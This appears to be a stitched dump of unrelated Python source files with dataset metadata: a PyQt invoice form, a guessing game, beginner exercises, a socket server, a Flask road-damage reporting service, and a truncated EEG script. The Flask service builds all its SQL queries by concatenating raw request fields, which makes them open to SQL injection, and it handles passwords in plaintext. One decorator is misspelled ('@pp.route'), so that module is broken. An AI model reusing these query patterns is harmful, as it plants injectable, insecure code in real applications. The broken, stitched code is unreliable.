customerlayout.addWidget(self.customerbtn,0,4)
customerlayout.addWidget(self.customeredit,0,5)
self.customerbtn.setIcon(QIcon('image/icon/team.png'))
self.customerbtn.setIconSize(QtCore.QSize(20,20))
self.customeredit.setIcon(QIcon('image/icon/boy.png'))
self.customeredit.setIconSize(QtCore.QSize(15,15))
self.customerbtn.clicked.connect(self.CustomerWindow)
self.customeredit.clicked.connect(self.CustomerEdit)
self.address=QTextEdit()
self.address.setMaximumHeight(50)
self.po_no=QLineEdit()
self.customertax=QComboBox()
self.customertax.addItems(['Default','Exempt'])
createfromlayout=QGridLayout()
self.createfrom=QComboBox()
self.createfrombtn=QPushButton("")
createfromlayout.addWidget(self.createfrom,0,0,0,4)
createfromlayout.addWidget(self.createfrombtn,0,4)
self.date()
termlayout= QGridLayout()
self.term=QComboBox()
self.term.addItems(["Pay in days","COD"])
self.spinbox = QSpinBox()
self.spinbox.setValue(30)
termlayout.addWidget(self.term,0,0)
termlayout.addWidget(self.spinbox,0,1)
self.salesperson=QComboBox()
self.salesperson.setEditable(True)
self.invoice_no=QLineEdit()
self.invoice_no.setReadOnly(True)
self.createfrom.addItems(["[ New Invoice]","Existing Invoice"])
self.invoice_number=self.requireddata['invoiceno']
self.invoice_no=QLineEdit(self.invoice_number)
self.salesaccount=QComboBox()
self.salesaccount.setEditable(True)
self.receivableaccount=QComboBox()
self.receivableaccount.setEditable(True)
self.customerdata=self.requireddata['customerdata']
self.customer.addItem("")
self.customer.currentTextChanged.connect(self.CustomerChange)
row=0
for key in sorted(self.customerdata):
self.customer.insertItem(row,self.customerdata[key][0])
row=row+1
self.revenueaccounts=self.requireddata['revenueaccounts']
self.salesaccount.addItem("")
self.salesaccount.insertItem(0,'-- Create a new account --')
row=1
completerlist=[]
for key in self.revenueaccounts:
self.salesaccount.insertItem(row,self.revenueaccounts[key][2])
row=row+1
completerlist.append(self.revenueaccounts[key][2])
completer = QCompleter(completerlist)
self.salesaccount.setCompleter(completer)
self.receivables=self.requireddata['receivableaccounts']
self.receivableaccount.addItem("")
self.receivableaccount.insertItem(0,'-- Create a new account --')
row=1
completerlist=[]
for key in self.receivables:
self.receivableaccount.insertItem(row,self.receivables[key][2])
row=row+1
completerlist.append(self.receivables[key][2])
completer = QCompleter(completerlist)
self.receivableaccount.setCompleter(completer)
billingform.addRow("Customer:",customerlayout)
billingform.addRow("Billing to:",self.address)
billingform.addRow("Customer PO No:",self.po_no)
billingform.addRow("Customer Tax:",self.customertax)
invoiceform.addRow("Create from:",createfromlayout)
invoiceform.addRow("Date:",self.dateedit1)
invoiceform.addRow("Terms:",termlayout)
invoiceform.addRow("Salesperson:",self.salesperson)
invoiceform.addRow("Invoice No:",self.invoice_no)
invoiceform.addRow("Revenue Account:",self.salesaccount)
invoiceform.addRow("Receivables Account:",self.receivableaccount)
self.addJournalTable()
textlayout=QGridLayout()
buttonlayout=QGridLayout()
mainlayout.addLayout(self.tablelayout,5)
mainlayout.addLayout(textlayout,2)
mainlayout.addLayout(buttonlayout,1)
self.comment=QTextEdit()
self.comment.setPlaceholderText('[Enter invoice note]')
self.nocomment=QTextEdit('Please contact us for more information about payment options.')
self.privatecomment=QTextEdit()
self.privatecomment.setPlaceholderText('[Enter internal notes]')
self.footnote=QTextEdit('Thank you for your business.')
commentgtab=QTabWidget()
commentgtab.addTab(self.comment,"Comments")
commentgtab.addTab(self.privatecomment,"Private comments")
commentgtab.addTab(self.nocomment,"No comment")
commentgtab.addTab(self.footnote,"Foot Comments")
totalform=QFormLayout()
totalform.setVerticalSpacing(5)
self.subtotal=QLabel(self.amt_placeholder)
self.tax=QLabel(self.amt_placeholder)
self.total=QLabel()
self.total.setText('<b>'+self.amt_placeholder+'</b>')
totalform.addRow('Subtotal:',self.subtotal)
totalform.addRow('Tax:',self.tax)
totalform.addRow('<b>Total</b>',self.total)
textlayout.addWidget(commentgtab,0,0,1,2)
textlayout.addWidget(QLabel(''),0,2)
textlayout.addLayout(totalform,0,3)
self.record=QPushButton('Record')
self.cancel=QPushButton('Cancel')
self.help=QPushButton('Help')
self.record.clicked.connect(self.Save_record)
self.cancel.clicked.connect(self.close)
buttonlayout.addWidget(QLabel(),0,0,1,3)
buttonlayout.addWidget(self.record,0,4)
buttonlayout.addWidget(self.cancel,0,5)
buttonlayout.addWidget(self.help,0,6)
if self.edit_data !={}:
edit_data=self.edit_data['0']
date=edit_data['0'][10]
year=(date.split('-'))[0]
month=(date.split('-'))[1]
day=(date.split('-'))[2]
self.dateedit1.setDate(QDate(int(year),int(month),int(day)))
self.customer.setCurrentText(edit_data['0'][6])
self.address.setText(edit_data['0'][7])
self.invoice_no.setText(edit_data['0'][9])
self.salesperson.setCurrentText(edit_data['0'][11])
self.receivableaccount.setCurrentText(edit_data['0'][1])
self.salesaccount.setCurrentText(edit_data['0'][4])
edit_data=self.edit_data['1']
self.UpdateRows(edit_data)
self.comborow=len(edit_data)
self.unitprice_changed_function(self.comborow-1)
self.comborow=len(self.edit_data)
if self.comborow>10:
self.rowCounts=(self.comborow+5)
self.table.setRowCount(self.rowCounts)
self.table.resizeRowsToContents()
def CustomerWindow(self):
self.customerlist=Customers(self)
self.customerlist.show()
def CustomerEdit(self):
self.customeredit=AddCustomer({})
self.customeredit.show()
def CustomerChange(self,obj):
try:
index=str(self.customer.currentIndex())
address=(self.customerdata.get(index))[7]
except Exception as e:
address=''
self.address.setText(address)
def date(self):
date = QDate()
currentdate=date.currentDate()
self.dateedit1 = QDateEdit()
self.setObjectName("dateedit")
self.dateedit1.setDate(currentdate)
self.dateedit1.setDisplayFormat('dd/MM/yyyy')
self.dateedit1.setCalendarPopup(True)
def addJournalTable(self):
JournalHeader=[" Qty "," Item "," Description "," Unit Price "," Tax "," Total ",""]
self.tablelayout=QVBoxLayout()
self.table =QTableWidget()
self.table.setColumnCount(7) #Set three columns
self.table.setRowCount(self.row)
self.table.setEditTriggers(QAbstractItemView.AllEditTriggers)
#self.table.setSizePolicy(QtWidgets.QSizePolicy.Expanding,QtWidgets.QSizePolicy.Minimum)
self.table.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Stretch)
header = self.table.horizontalHeader()
header.setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(1, QtWidgets.QHeaderView.Stretch)
header.setSectionResizeMode(2, QtWidgets.QHeaderView.Stretch)
header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(4, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(5,1*(QtWidgets.QHeaderView.Stretch)//2)
header.setSectionResizeMode(6, QtWidgets.QHeaderView.ResizeToContents)
self.tablelayout.addWidget(self.table)
self.table.clicked.connect(self.AddJournals)
self.table.resizeRowsToContents()
self.table.setSelectionMode(QAbstractItemView.MultiSelection)
self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.table.setShowGrid(True)
self.table.setHorizontalHeaderLabels(JournalHeader)
self.table.horizontalHeaderItem(0).setToolTip("Click on any row to add an account")
self.table.horizontalHeaderItem(1).setToolTip("")
self.table.horizontalHeaderItem(2).setToolTip("")
self.table.horizontalHeaderItem(6).setToolTip("Click to delete a row")
def AddJournals(self,item):
currRow=(item.row())
col=item.column()
if col==0:
qty=QComboBox()
qty.setEditable(True)
item=QComboBox()
item.setEditable(True)
description=QComboBox()
description.setEditable(True)
unitprice=QLineEdit()
tax=QComboBox()
tax.setEditable(True)
total=QLabel()
image = ImageWidget('image/icon/clear.png', self)
unitprice.setPlaceholderText(self.amt_placeholder)
total.setText(self.amt_placeholder)
if self.comborow not in self.widgetDic:
widgetList=[]
widgetList.append(qty)
widgetList.append(item)
widgetList.append(description)
widgetList.append(unitprice)
widgetList.append(tax)
widgetList.append(total)
self.widgetDic[self.comborow]=widgetList
(self.widgetDic[self.comborow][3]).textChanged.connect(partial(self.unitprice_changed_function,self.comborow))
(self.widgetDic[self.comborow][0]).currentTextChanged.connect(partial(self.unitprice_changed_function,self.comborow))
self.table.setCellWidget(self.comborow,0,qty)
self.table.setCellWidget(self.comborow,1,item)
self.table.setCellWidget(self.comborow,2, description)
self.table.setCellWidget(self.comborow,3,unitprice)
self.table.setCellWidget(self.comborow,4,tax)
self.table.setCellWidget(self.comborow,5, total)
self.table.setCellWidget(self.comborow, 6, image)
self.comborow=self.comborow+1
if self.comborow==self.rowCounts:
self.rowCounts+5
self.rowCounts=(self.rowCounts+5)
self.table.setRowCount(self.rowCounts)
self.table.resizeRowsToContents()
if col==6:
self.DeleteRow(currRow)
def DeleteRow(self,row):
if row in self.widgetDic.keys():
self.widgetDic.pop(row)
invoicedata={}
index=0
for key in sorted(self.widgetDic):
data_list=[]
for col in range(6):
if col==0:
data_list.append((self.widgetDic[key][0]).currentText())
if col==1:
data_list.append((self.widgetDic[key][1]).currentText())
if col==2:
data_list.append((self.widgetDic[key][2]).currentText())
if col==3:
data_list.append((self.widgetDic[key][3]).text())
if col==4:
data_list.append((self.widgetDic[key][4]).currentText())
if col==5:
data_list.append((self.widgetDic[key][5]).text())
invoicedata[index]=data_list
index=index+1
self.UpdateRows(invoicedata)
self.comborow=self.comborow-1
if self.rowCounts>10:
self.rowCounts=(self.rowCounts-1)
self.table.setRowCount(self.rowCounts)
self.table.resizeRowsToContents()
self.unitprice_changed_function(row-1)
def UpdateRows(self,invoicedata):
self.table.clearContents()
self.widgetDic={}
for keys in sorted(invoicedata):
try:
widgetList=[]
qty=QComboBox()
qty.setEditable(True)
item=QComboBox()
item.setEditable(True)
description=QComboBox()
description.setEditable(True)
unitprice=QLineEdit()
tax=QComboBox()
tax.setEditable(True)
total=QLabel()
unitprice.setPlaceholderText(self.amt_placeholder)
qty.setCurrentText(invoicedata[keys][0])
item.setCurrentText(str(invoicedata[keys][1]))
description.setCurrentText(invoicedata[keys][2])
unitprice.setText(invoicedata[keys][3])
tax.setCurrentText(str(invoicedata[keys][4]))
total.setText(invoicedata[keys][5])
self.table.setCellWidget(int(keys),0,qty)
self.table.setCellWidget(int(keys),1,item)
self.table.setCellWidget(int(keys),2, description)
self.table.setCellWidget(int(keys),3,unitprice)
self.table.setCellWidget(int(keys),4,tax)
self.table.setCellWidget(int(keys),5, total)
image = ImageWidget('image/icon/clear.png', self)
self.table.setCellWidget(int(keys), 6, image)
widgetList.append(qty)
widgetList.append(item)
widgetList.append(description)
widgetList.append(unitprice)
widgetList.append(tax)
widgetList.append(total)
self.widgetDic[int(keys)]=widgetList
unitprice.textChanged.connect(partial(self.unitprice_changed_function,int(keys)))
qty.currentTextChanged.connect(partial(self.unitprice_changed_function,int(keys)))
except Exception as e:
print(e)
def unitprice_changed_function(self,currrow):
if currrow==-1:
return False
try:
float((self.widgetDic[currrow][0]).currentText())
except Exception as e:
(self.widgetDic[currrow][0]).setCurrentText('')
try:
float((self.widgetDic[currrow][3]).text())
except Exception as e:
(self.widgetDic[currrow][3]).setText('')
try:
qty=(self.widgetDic[currrow][0]).currentText()
unitprice=(self.widgetDic[currrow][3]).text()
if qty=="" or unitprice=="":
return False
total_=float(qty)*float(unitprice)
(self.widgetDic[currrow][5]).setText(format_currency(total_,'NGN', locale='en_US'))
total=0
for row in self.widgetDic:
widget=self.widgetDic[row]
if (widget[3]).text()=="" or (widget[3]).text()=="":
return False
qty=(widget[0]).currentText()
unitprice=(widget[3]).text()
total=total+float(qty)*float(unitprice)
self.subtotal.setText(format_currency(total,'NGN', locale='en_US'))
#self.tax=QLabel(self.amt_placeholder)
self.total.setText('<b>'+format_currency(total,'NGN', locale='en_US')+'</b>')
except Exception as e:
if (self.widgetDic[currrow][5]).text()=="":
return False
val1=(((self.widgetDic[currrow][5]).text()).split('₦'))[1]
val2=((((self.total.text()).split('₦'))[1]).split('</b>'))[0]
val=float(val2)-float(val1)
(self.widgetDic[currrow][5]).clear()
self.subtotal.setText(format_currency(val,'NGN', locale='en_US'))
#self.tax=QLabel(self.amt_placeholder)
self.total.setText('<b>'+format_currency(val,'NGN', locale='en_US')+'</b>')
def Save_record(self):
date1=self.dateedit1.date()
year1=str(date1.year())
day1=str(date1.day()) if len(str(date1.day()))==2 else '0'+str(date1.day())
month1=str(date1.month()) if len(str(date1.month()))==2 else '0'+str(date1.month())
date=(year1+'-'+month1+'-'+day1)
date2=self.dateedit1.date()
year2=str(date2.year())
day2=str(date2.day()) if len(str(date2.day()))==2 else '0'+str(date2.day())
month2=str(date2.month()) if len(str(date2.month()))==2 else '0'+str(date2.month())
duedate=(year2+'-'+month2+'-'+day2)
userdb=open("db/user.json", "r")
user=json.load(userdb)
journaltype="Sales"
address=(self.address.toPlainText())
customer=self.customer.currentText()
memo="Sales;"+customer
ref="SLS[AUTO]"
revenueaccounts=self.salesaccount.currentText()
receivables=self.receivableaccount.currentText()
customerdata=self.customer.currentText()
if revenueaccounts=="" or receivables=="" or customerdata=="":
return False
salesaccount=self.revenueaccounts[str(self.salesaccount.currentIndex()-1)]
receivableaccount=self.receivables[str(self.receivableaccount.currentIndex()-1)]
customer=self.customerdata[str(self.customer.currentIndex())]
invoiceDic={}
total=0
subtotal=[]
for row in self.widgetDic:
amnt=(self.widgetDic[row][5]).text()
amnt=amnt.split('₦')
invoicelist=[]
invoicelist.append(receivableaccount[2])
invoicelist.append(customer[8])
invoicelist.append(customer[0])
invoicelist.append(address)
invoicelist.append(ref)
invoicelist.append(self.invoice_no.text())
#invoicelist.append(int(self.requireddata['invoiceid'])+counts)
invoicelist.append(date)
invoicelist.append(duedate)
invoicelist.append(self.salesperson.currentText())
invoicelist.append((self.widgetDic[row][0]).currentText())
invoicelist.append((self.widgetDic[row][1]).currentText())
invoicelist.append((self.widgetDic[row][2]).currentText())
invoicelist.append((self.widgetDic[row][3]).text())
invoicelist.append(str(float(parse_decimal(amnt[1],locale='en_US'))))
invoicelist.append("Not Paid")
invoicelist.append(user)
invoicelist.append(salesaccount[2])
invoiceDic[row]=invoicelist
total=total+float(parse_decimal(amnt[1],locale='en_US'))
subtotal.append(float(parse_decimal(amnt[1],locale='en_US')))
postDic={}
rw=0
for sub in subtotal:
postList=[]
postList.append(salesaccount[2])
postList.append(str(sub))
postList.append('Credit')
postList.append(ref)
postList.append(journaltype)
postList.append(memo)
postList.append(date)
postList.append(user)
postDic[rw]=postList
rw=rw+1
postList=[]
postList.append(receivableaccount[2])
postList.append(str(total))
postList.append('Debit')
postList.append(ref)
postList.append(journaltype)
postList.append(memo)
postList.append(date)
postList.append(user)
postList.append(invoiceDic)
postDic[rw]=postList
postDic=json.dumps(postDic)
postDic=base64.b64encode(postDic.encode())
data = QtCore.QByteArray()
data.append("action=postjournal&")
data.append("invoice=invoice&")
data.append("journal={}".format(postDic.decode("utf-8")))
url = "http://{}:5000/journal".format(self.ip)
req = QtNetwork.QNetworkRequest(QtCore.QUrl(url))
req.setHeader(QtNetwork.QNetworkRequest.ContentTypeHeader,
"application/x-www-form-urlencoded")
self.nam = QtNetwork.QNetworkAccessManager()
self.nam.finished.connect(self.handleResponse)
#return False
self.nam.post(req, data)
def handleResponse(self, reply):
er = reply.error()
if er == QtNetwork.QNetworkReply.NoError:
bytes_string = reply.readAll()
json_ar = json.loads(str(bytes_string, 'utf-8'))
#data = json_ar['form']
if json_ar['19']=='Success':
journaltype=json_ar['30']
ref=json_ar['25']
date=json_ar['35']
self.MessageBox.setWindowTitle('Post Journal')
self.MessageBox.setText("")
self.MessageBox.setInformativeText("{j} Journal with Ref: {r} was succesfully posted\non {d}. " "\n\nClick Ok to exit.".format(j=journaltype,r=ref,d=date))
self.MessageBox.setIcon(self.MessageBox.Information)
self.MessageBox.setStandardButtons(self.MessageBox.Ok)
self.MessageBox.show()
self.invoice_no.setText(str(int(self.invoice_no.text())+1))
result = self.MessageBox.exec_()
if result==self.MessageBox.Ok:
pass
else:
QMessageBox.critical(self, 'Databese Connection ', "\n {} \n".format(reply.errorString()))
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Invoice({})
ex.show()
sys.exit(app.exec_()) | [
"[email protected]"
] | |
4f2d7e9a93ccb1c73bfa12146ad9add11e573b27 | d07a26e443538c5fc6b0711aff6e233daef79611 | /LearnPythonGuessGame.py | e3a41526a4b12716d27871e2464f08f1855a7ba6 | [] | no_license | Zahidsqldba07/Python-learn | bd602d490ee53f8e5331e70f92919ca315944ff9 | ffc1608695ed6c7c3d2b6789913e34235dcf468e | refs/heads/master | 2023-03-16T02:18:19.155281 | 2020-09-19T09:12:48 | 2020-09-19T09:12:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | secret_word = "respect"
guess = ''
guess_count = 0
guess_limit = 7
out_of_guesses = False
while guess != secret_word and not (out_of_guesses):
if guess_count < guess_limit:
guess = input("What's the secret word?: ")
guess_count += 1
if guess != secret_word:
print("Hint: " + secret_word[int(guess_count)-1])
else:
out_of_guesses = True
if out_of_guesses:
print("All out of guesses, better luck next time!")
exit()
else:
print("Nice work!")
exit() | [
"[email protected]"
] | |
3b475b2198f533613949bc998bef4a4c42ea826f | 5eb13a4e16bd195e9ef823021bc296a747ff98bb | /pbsetq4.py | 3ae1819bfbf979e447b978bf7e4af69530947dcc | [] | no_license | Santosh2108/Python | 59fff6d744ce4a1992489c43d7bacbe45a869a2a | b486fc18417d5463852a4f06eeb922aa2f648f6b | refs/heads/master | 2020-03-22T11:22:29.245458 | 2018-07-12T10:37:41 | 2018-07-12T10:37:41 | 139,967,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | #A) finding area of the sphere
r = int(raw_input('Enter the radius of the sphere: '))
area=(4/3.0)*3.14*(r**3)
print ('the area of the sphere is',area )
#B) Wholesale rate
coverprice=24.95
discount=40/100.0
shippingcost=3
additional=0.75
count=60
discountprice=coverprice*discount
totalprice=(coverprice-discountprice)*count
total= totalprice+shippingcost+(count-1)*additional
print ('price for 60 books',total )
#C) Time calculation
timeleft = 6 * 3600 + 52 *60
easy = 2 * (8 * 60 + 15 )
fast = 3 * (7 * 60 + 12 )
totaltime = easy + fast + timeleft
hours = totaltime/ 3600
remainingseconds= totaltime % 3600
minutes = remainingseconds /60
seconds = remainingseconds % 60
print ('Hours:',hours)
print ('minutes:', minutes)
print ('seconds:', seconds)
| [
"[email protected]"
] | |
4c38981263972d95636d6e02fdba40dbd8f2c5a8 | 0f4cd79db1379dc151e74400b6fc6a79d5b52d08 | /work06/code/server.py | 3eda8298462d5eed64997dd7e199f250b574a1ff | [] | no_license | Detect-er/Coursework | 3cdffe84a61029e31420a4d89341208937520d02 | 91061dc0b2bed021d092e3da933e716c026ba838 | refs/heads/master | 2021-03-22T17:37:39.847713 | 2020-06-13T03:03:56 | 2020-06-13T03:03:56 | 247,388,020 | 3 | 2 | null | 2020-03-22T13:32:24 | 2020-03-15T02:29:43 | C | UTF-8 | Python | false | false | 1,211 | py | from socket import *
from time import ctime
HOST = '127.0.0.1'
PORT = 4567
BUFSIZ = 1024
ADDR = (HOST,PORT)
filename = "/mnt/ext4scull"
#1、创建服务端的socket对象
tcpSerSock = socket(AF_INET,SOCK_STREAM)
#2、绑定一个ip和端口
tcpSerSock.bind(ADDR)
#3、服务器端一直监听是否有客户端进行连接
tcpSerSock.listen(5)
while True:
print('waiting for connection...')
# 4、如果有客户端进行连接、则接受客户端的连接
tcpCliSock, addr = tcpSerSock.accept() #返回客户端socket通信对象和客户端的ip
print('...connnecting from:', addr)
while True:
# 5、客户端与服务端进行通信
data = tcpCliSock.recv(BUFSIZ).decode()
if not data:
break
print("From client: %s"%data)
# 6、从filename文件中读取scull设备的信息
with open(filename) as f:
content = f.read()
f.close()
# 7、服务端给客户端回消息
tcpCliSock.send(('the time is: [%s]\ntemperature is: %s\nhumidity is: %s' % (
ctime(), content.split()[0], content.split()[1])).encode())
# 8、关闭socket对象
tcpCliSock.close()
tcpSerSock.close()
| [
"[email protected]"
] | |
cb5a4b34fb49207a33bf8d1192cb7f3761407b26 | 237598dd6cbd3b85f79221195491893814de8574 | /webservicenew.py | 6e60576ab4f7d1321564d3d4541d55ebdd81e368 | [] | no_license | harsha97sahajan/Road-Damage-Detection | 88ede0cb90f93e9e6ab9df5b72432542c0af0240 | 5c85bb740151e872f027af28ab4a8e53fc2b5a8c | refs/heads/main | 2023-08-30T07:03:41.069394 | 2021-11-12T05:53:38 | 2021-11-12T05:53:38 | 427,242,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,188 | py | import os
from flask import *
import pymysql
from werkzeug.utils import secure_filename
from src.classify import predictfn
con = pymysql.connect(host='localhost', port=3306, user='root', passwd='', db='roadsens')
cmd = con.cursor()
app = Flask(__name__)
@app.route('/userreg', methods=['get', 'post'])
def userreg():
fname = request.form['fname']
mname = request.form['mname']
lname = request.form['lname']
ph = request.form['ph']
email = request.form['email']
username = request.form['un']
pwd = request.form['pwd']
cmd.execute("select * from login where username='" + username + "' and type='user'")
s = cmd.fetchone()
if s is not None:
return jsonify({'task': "invalid"})
else:
cmd.execute("INSERT INTO`login` values(null,'" + username + "','" + pwd + "','user')")
id = con.insert_id()
cmd.execute("insert into user_reg values(null,'" + str(id) + "','" + fname + "','" + mname + "','" + lname + "','" + ph + "','" + email + "')")
con.commit()
return jsonify({'task': "success"})
@app.route('/login', methods=['POST'])
def login():
try:
username = request.form['un']
pwd = request.form['pwd']
try:
cmd.execute(
"select * from login where username='" + username + "' and password='" + pwd + "'")
s = cmd.fetchone()
print(s)
if s is not None:
id = s[0]
print(id)
return jsonify({'task': str(id), 'type': s[3]})
else:
return jsonify({'task': "invalid"})
except Exception as e:
print(str(e))
return jsonify({'task': "invalid"})
except Exception as e:
print(e)
return jsonify({'task': "success"})
@app.route('/send_spot_complaint', methods=['get', 'post'])
def send_spot_complaint():
latitude = request.form['latitude']
print(latitude)
longitude = request.form['longitude']
complaint = request.form['complaint']
uid = request.form['uid']
image=request.files['files']
file=secure_filename(image.filename)
image.save(os.path.join("./static/image",file))
cmd.execute(
"insert into spotcomplaint values(null,'" + uid + "','" + latitude + "','" + longitude + "','" + complaint + "','pending',null,'"+str(file)+"')")
con.commit()
return jsonify({'task': "success"})
@app.route('/send_emg_alert', methods=['get', 'post'])
def send_emg_alert():
latitude = request.form['latitude']
longitude = request.form['longitude']
description = request.form['description']
uid = request.form['uid']
cmd.execute(
"insert into emergency_alert values(null,'" + uid + "','" + latitude + "','" + longitude + "','" + description + "')")
con.commit()
return jsonify({'task': "success"})
@app.route('/view_signal', methods=['POST', 'GET'])
def view_signal():
latitude = request.form['latitude']
longitude = request.form['longitude']
cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(
latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
longitude) + "') ) + SIN ( RADIANS('" + str(
latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from trafficsignal_reg HAVING user_distance < 6.2137")
print("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(
latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
longitude) + "') ) + SIN ( RADIANS('" + str(
latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from trafficsignal_reg HAVING user_distance < 6.2137")
s = cmd.fetchall();
print(s)
row_headers = [x[0] for x in cmd.description]
json_data = []
for result in s:
json_data.append(dict(zip(row_headers, result)))
print(json_data)
return jsonify(json_data)
@app.route('/view_important_place', methods=['POST', 'GET'])
def view_important_place():
latitude = request.form['latitude']
longitude = request.form['longitude']
cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS('" + str(latitude) + "') ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS('" + str(
longitude) + "') ) + SIN ( RADIANS('" + str(latitude) + "') ) * SIN( RADIANS(`latitude`) ))) AS user_distance from imp_place_reg HAVING user_distance < 6.2137")
s = cmd.fetchall();
print(s)
row_headers = [x[0] for x in cmd.description]
json_data = []
for result in s:
json_data.append(dict(zip(row_headers, result)))
print(json_data)
return jsonify(json_data)
@app.route('/view_complaint', methods=['POST', 'GET'])
def view_complaint():
cmd.execute(" SELECT `spotcomplaint`.* ,`user_reg`.`fname`,`mname`,`lname`,`phone` FROM `user_reg` JOIN `spotcomplaint` ON `spotcomplaint`.`uid`=`user_reg`.lid where status='pending'")
s = cmd.fetchall();
print(s)
row_headers = [x[0] for x in cmd.description]
json_data = []
for result in s:
json_data.append(dict(zip(row_headers, result)))
print(json_data)
return jsonify(json_data)
@app.route('/view_status', methods=['POST', 'GET'])
def view_status():
uid = request.form['uid']
cmd.execute( " SELECT`spotcomplaint`.complaint,status,`traffic_police_reg`.`fname`,`mname`,`lname`,`phone` FROM `traffic_police_reg` JOIN `spotcomplaint` ON `spotcomplaint`.`policid`=`traffic_police_reg`.lid WHERE uid='" + uid + "'")
s = cmd.fetchall();
print(s)
row_headers = [x[0] for x in cmd.description]
json_data = []
for result in s:
json_data.append(dict(zip(row_headers, result)))
print(json_data)
return jsonify(json_data)
@app.route('/view_emergency_alert', methods=['POST', 'GET'])
def view_emergency_alert():
cmd.execute("SELECT `emergency_alert`.`descripion` ,`user_reg`.`fname`,`mname`,`lname`,`phone` FROM `user_reg` JOIN `emergency_alert` ON `emergency_alert`.`uid`=`user_reg`.lid ")
s = cmd.fetchall();
print(s)
row_headers = [x[0] for x in cmd.description]
json_data = []
for result in s:
json_data.append(dict(zip(row_headers, result)))
print(json_data)
return jsonify(json_data)
@app.route('/update_status', methods=['POST', 'GET'])
def update_status():
sc_id = request.form['cid']
reply=request.form['reply']
pid=request.form['pid']
cmd.execute( "UPDATE `spotcomplaint` SET `spotcomplaint`.`status`='"+reply+"',policid='"+pid+"' WHERE `spotcomplaint`.`sc_id`='"+str(sc_id)+"'")
con.commit()
return jsonify({'task': "success"})
@app.route('/emergency', methods=['get', 'post'])
def emergency():
latitude = request.form['latitude']
longitude = request.form['longitude']
speed = request.form['speed']
cmd.execute("insert into distruption values(null,'" + latitude + "','" + longitude + "','" +speed + "',now())")
con.commit()
return jsonify({'task': "success"})
@app.route('/service',methods=['POST'])
def service():
latitude=request.form['lati']
longitude=request.form['longi']
cmd.execute("select * ,(3959 * ACOS ( COS ( RADIANS("+latitude+") ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS("+longitude+") ) + SIN ( RADIANS("+latitude+") ) * SIN( RADIANS(`latitude`) ))) AS user_distance from distruption where strength<4440 and strength>1000 and date>=DATE_ADD(curdate(),interval -10 day) HAVING user_distance < 2 ")
s=cmd.fetchall()
cmd.execute(
"select * ,(3959 * ACOS ( COS ( RADIANS(" + latitude + ") ) * COS( RADIANS(`latitude`) ) * COS( RADIANS(`longitude`) - RADIANS(" + longitude + ") ) + SIN ( RADIANS(" + latitude + ") ) * SIN( RADIANS(`latitude`) ))) AS user_distance from distruption where strength<4440 and strength>1000 and date<DATE_ADD(curdate(),interval -10 day)and date>DATE_ADD(curdate(),interval -20 day) HAVING user_distance < 2 ")
s1 = cmd.fetchall()
if len(s1)<len(s):
if len(s)>5:
return jsonify({"task":"yes"})
else:
return jsonify({"task": "no"})
else:
if len(s1)>5:
p=(len(s)/len(s1))*100
if p>50.0:
return jsonify({"task": "yes"})
else:
return jsonify({"task": "no"})
else:
return jsonify({"task": "no"})
@pp.route("/capture",methods=['post'])
def capture():
img=request.files["files"]
lt=request.form['latitude']
lon=request.form['longitude']
file = secure_filename(img.filename)
img.save(os.path.join("camimg/image", file))
re=predictfn(os.path.join("camimg/image", file))
if re=='normal':
cmd.execute("insert into distruption values(null,'" + lt + "','" + lon + "','4000',now())")
con.commit()
return jsonify({'task': "success"})
if (__name__ == "__main__"):
app.run(host='0.0.0.0', port=5000)
| [
"[email protected]"
] | |
667907153fb3690183536d53d10538fd0e5ee2f8 | bfc25f1ad7bfe061b57cfab82aba9d0af1453491 | /data/external/repositories_2to3/197978/Grasp-and-lift-EEG-challenge-master/genInfos.py | 3fe287f7ae615d7d863ba13934411a5cad7ad2b9 | [
"MIT"
] | permissive | Keesiu/meta-kaggle | 77d134620ebce530d183467202cf45639d9c6ff2 | 87de739aba2399fd31072ee81b391f9b7a63f540 | refs/heads/master | 2020-03-28T00:23:10.584151 | 2018-12-20T19:09:50 | 2018-12-20T19:09:50 | 147,406,338 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,710 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 21:35:28 2015.
@author: fornax
"""
import numpy as np
import pandas as pd
from glob import glob
from mne import concatenate_raws
from preprocessing.aux import creat_mne_raw_object
# #### define lists #####
subjects = list(range(1, 13))
lbls_tot = []
subjects_val_tot = []
series_val_tot = []
ids_tot = []
subjects_test_tot = []
series_test_tot = []
# #### generate predictions #####
for subject in subjects:
print('Loading data for subject %d...' % subject)
# ############### READ DATA ###############################################
fnames = glob('data/train/subj%d_series*_data.csv' % (subject))
fnames.sort()
fnames_val = fnames[-2:]
fnames_test = glob('data/test/subj%d_series*_data.csv' % (subject))
fnames_test.sort()
raw_val = concatenate_raws([creat_mne_raw_object(fname, read_events=True)
for fname in fnames_val])
raw_test = concatenate_raws([creat_mne_raw_object(fname, read_events=False)
for fname in fnames_test])
# extract labels for series 7&8
labels = raw_val._data[32:]
lbls_tot.append(labels.transpose())
# aggregate infos for validation (series 7&8)
raw_series7 = creat_mne_raw_object(fnames_val[0])
raw_series8 = creat_mne_raw_object(fnames_val[1])
series = np.array([7] * raw_series7.n_times +
[8] * raw_series8.n_times)
series_val_tot.append(series)
subjs = np.array([subject]*labels.shape[1])
subjects_val_tot.append(subjs)
# aggregate infos for test (series 9&10)
ids = np.concatenate([np.array(pd.read_csv(fname)['id'])
